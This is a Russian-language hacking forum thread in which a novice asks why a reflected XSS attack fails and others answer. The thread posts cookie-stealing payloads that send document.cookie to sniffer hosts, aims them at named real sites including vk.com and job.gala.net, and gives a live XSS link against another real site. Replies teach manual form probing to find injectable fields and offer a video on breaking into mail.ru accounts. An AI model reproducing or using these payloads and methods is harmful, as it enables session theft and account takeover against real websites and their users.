Привет кул хакеры . Я в этом деле новичек , поэтому не глумитесь Прошу растолковать чего .

Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

В результате эксплорер пишет : выполнение скрипта остановленно для того чтобы спасти вас от своей же xss для ее проверки . Через другие браузеры сообщений с ошибкой нету , но на сниффер ничего не приходит .
__________________________________________________ ____________
Конкретный пример ( Уязвимость с antichat )

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert('xz che za')

Браузер останавливает выполнение скрипта .

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">
img = new Image(); img.src = "http://httpz.ru/nv62w35bb1k.gif?"+document.cookie;

Тоже самое и в этом случае ( осторожно ссылка на мой сниффер )

Даже если я кодирую свой xss через http://ha.ckers.org/xss.html (https://hpc.name/redirector.html#http://ha.ckers.org/xss.html) всеравно , на лог сниффера ничего не приходит , хоть и ошибки в браузере не вылезает .

Даже самого себя взломать не могу :(((( Печаль
__________________________________________________ _______________

Вопрос :
1)Все ли правильно я делал в xss атаке , до проблеммы с браузером ?
2) Если ответ на первый вопрос " да " , то как обойти этот браузер и будет ли работать ( тоесть получу ли я свои куки ) если ссылка будет открыта через старый браузер ?
3) Самостоятельно я еще не находил пассивную xss , все брал форумов . Правильно ли я понял что если при отправке вот этого vk.com/hackDurov.php?enterXSS=alert('YouAreCoolHacker') вылезет табличка javascript , это значит что в этом месте можно уязвимость и можно внедрять любой html код .
__________________________________________________ __________

Заранее спасибо .

стукни в скайп sany7771996 скину видео по взлому мыла там как раз через xss его посмотриш и сразу вопросов не будет

Цитата:

Сообщение от prostopirat

стукни в скайп sany7771996 скину видео по взлому мыла там как раз через xss его посмотриш и сразу вопросов не будет

И мне скинь если не трудно)

Взлом mail.ru с помощью пассивной XSS. (https://hpc.name/downloads.php?do=file&id=3411)

Та же фигня. Делаю всё точь в точь как в видео, на что получаю весьма не утешительную надпись со стороны ie 8 "Браузером Internet Explorer эта страница была изменена для предотвращения запуска скриптов между сайтами". Остальные же браузеры тупо игнорят скрипт, ведь в логе таки чуть менее чем ничего.

[quote=MashaRomanova;365742]
Пытаюсь сделать пассивную xss :
Пишу что - то вроде vk.com/hackMe/it_is_our_xss.php?yourXSS=
img = new Image(); img.src = "http://kartinkaSniffer.ru/kggg.gif?"+document.cookie;

Чувак) не хера так не получится у тя)) сделать) тебе для начало надо найти xss) а для этого ищи все формы) на фильтрацию спец символов, "" После того как найдешь) пиши скрипт, лучше не юзай сервисы) возьми себе vds сервер, натяни туда isp и просто смотри логи) Сейчас я найду тебе xss на каком нить сайте)

-------

Вот нашел xss на каком то Исламском сайте) я ищу всегда xss вручную, пишу по формам 12345> и смотрю пропустила форма символ > или нет) если да, то начинаю творить скрипт)
Вот кста уязвимость

http://isxak.ru/?s=%3C%2Ftitle%3E%3C...t=%D0%BE%D0%BA (https://hpc.name/redirector.html#http://isxak.ru/?s=%3C%2Ftitle%3E%3Cimg+src%3D%22http%3A%2F%2Fwww. povarenok.ru%2Fimages%2Frecipes%2Fstep%2F27%2F2777 %2F277772.jpg%22%3E%3Cscript%3Ealert%28%27%D0%AD%D 1%82%D0%BE+xss+%D1%83%D1%8F%D0%B7%D0%B2%D0%B8%D0%B C%D0%BE%D1%81%D1%82%D1%8C%2C+%D0%B4%D0%B0+%D0%BF%D 1%80%D0%BE%D1%81%D1%82%D0%B8%D1%82+%D0%BC%D0%B5%D0 %BD%D1%8F+%D0%90%D0%BB%D0%BB%D0%B0%D1%85%2C+%D1%83 %D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%B0%D1%8F+%D1%84% D0%BE%D1%80%D0%BC%D0%B0+%D0%BF%D0%BE%D0%B8%D1%81%D 0%BA%D0%B0%2C+%D0%BE%D0%BD%D0%B0+%D0%BF%D1%80%D0%B E%D0%BF%D1%83%D1%81%D0%BA%D0%B0%D0%B5%D1%82+%D1%81 %D0%BF%D0%B5%D1%86+%D1%81%D0%B8%D0%BC%D0%B2%D0%BE% D0%BB%D1%8B%27%29%3C%2Fscript%3E&submit=%D0%BE%D0%BA)

Посмотрите внимательно) изучите все) и тд и тп..... Буду вопросы пишите сюда)

руки у вас просто не из того места ростут

Цитата:

Сообщение от oobs

руки у вас просто не из того места ростут

Смешной не могу. Сделай всё так же, как в видео на ie9 (за исключением пасивки конечно). Получи куки и я тебе лично 10 000 рублей кину ок? =D

source:


vk.
com
/hackDurov.
php
?enterXSS=
alert('YouAreCoolHacker')


Тут нету пассивки, это для примера показали)
И вообще где видео?

Уже не пашет что ли ?

Пашет, но не везде. Скажем опера или какой-нибудь фаер фокс тебе их запустит. А вот ие 8-10 или хром пошлют тебя в тридевятое царство тридесятое государство искать способы обхода фильтров.

Блеать)) тут вообще нету http://vk.com/hackDurov.php? (https://hpc.name/redirector.html#http://vk.com/hackDurov.php?) страницы.. Нету форм. это для примера показали вам..! И не в каком браузере она пахать не будет)
Вот Вам пассивка http://isxak.ru/?s=%3C%2Ftitle%3E%3C...t=%D0%BE%D0%BA (https://hpc.name/redirector.html#http://isxak.ru/?s=%3C%2Ftitle%3E%3Cimg+src%3D%22http%3A%2F%2Fwww. povarenok.ru%2Fimages%2Frecipes%2Fstep%2F27%2F2777 %2F277772.jpg%22%3E%3Cscript%3Ealert%28%27%D0%AD%D 1%82%D0%BE+xss+%D1%83%D1%8F%D0%B7%D0%B2%D0%B8%D0%B C%D0%BE%D1%81%D1%82%D1%8C%2C+%D0%B4%D0%B0+%D0%BF%D 1%80%D0%BE%D1%81%D1%82%D0%B8%D1%82+%D0%BC%D0%B5%D0 %BD%D1%8F+%D0%90%D0%BB%D0%BB%D0%B0%D1%85%2C+%D1%83 %D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%B0%D1%8F+%D1%84% D0%BE%D1%80%D0%BC%D0%B0+%D0%BF%D0%BE%D0%B8%D1%81%D 0%BA%D0%B0%2C+%D0%BE%D0%BD%D0%B0+%D0%BF%D1%80%D0%B E%D0%BF%D1%83%D1%81%D0%BA%D0%B0%D0%B5%D1%82+%D1%81 %D0%BF%D0%B5%D1%86+%D1%81%D0%B8%D0%BC%D0%B2%D0%BE% D0%BB%D1%8B%27%29%3C%2Fscript%3E&submit=%D0%BE%D0%BA)

Так-то я отвечал на вопрос пашет ли xss в целом, а не про данный конкретный пример.